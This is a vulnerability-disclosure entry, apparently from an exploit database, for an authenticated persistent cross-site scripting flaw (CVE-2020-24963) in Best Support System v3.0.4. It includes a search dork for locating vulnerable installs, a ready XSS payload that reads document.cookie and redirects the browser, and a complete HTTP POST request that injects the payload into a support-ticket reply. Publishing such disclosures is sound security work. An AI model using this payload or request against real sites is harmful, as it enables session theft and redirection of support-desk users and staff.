Best Support System v3.0.4 - Authenticated Persistent XSS

2020.09.05
ru Ex.Mi (RU) ru
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

[+] :: Exploit Title: Best Support System v3.0.4 - Authenticated Persistent XSS [+] :: Google Dork: "Powered By Best Support System" [+] :: Date: 2020-08-23 [+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ] [+] :: Vendor: Appsbd [ https://appsbd.com ] [+] :: Software Version: 3.0.4 [+] :: Software Link: https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317 [+] :: Tested on: Kali Linux [+] :: CVE: CVE-2020-24963 [+] :: CWE: CWE-79 [i] :: Info: An Authenticated Persistent XSS vulnerability was discovered in the Best Support System, tested version — v3.0.4. [$] :: Payload: 13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);location=`https://ex-mi.ru`;> [!] :: PoC (Burp Suite POST request): POST /support-system/ticket-confirm/ticket-reply/11.html HTTP/1.1 Host: demo.appsbd.com Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 350 Origin: https://demo.appsbd.com Connection: close Referer: https://demo.appsbd.com/support-system/ticket/details/11.html Cookie: [cookies_here] app_form=8d1c319d5826a789b3ca3e71516b0c5c&ticket_body=%3Cp%3E%3Cbr%3E%3C%2Fp%3E13%22--%26gt%3B%22%26gt%3B'%60+--+%60%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3D%22x%22+onerror%3D%22(alert)(%60Ex_Mi%60)%3B(alert)(document.cookie)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%60%3B%22%3E&status=&app_form_ajax=ad1ce2b2c3eb943efaa8c239ff53acc2 [+] :: Contacts: Website: ex-mi.ru Telegram: @ex_mi GitHub: @ex-mi Medium: @ex.mi

References:

https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317
https://medium.com/@ex.mi/php-best-support-system-v3-0-4-authenticated-persistent-xss-dfe6d4a06f75
https://ex-mi.ru/exploit/[2020-08-23]-[PHP]-best-support-system-v3.0.4.txt
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24963
https://www.youtube.com/watch?v=Lz0-WWbw2Sw


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top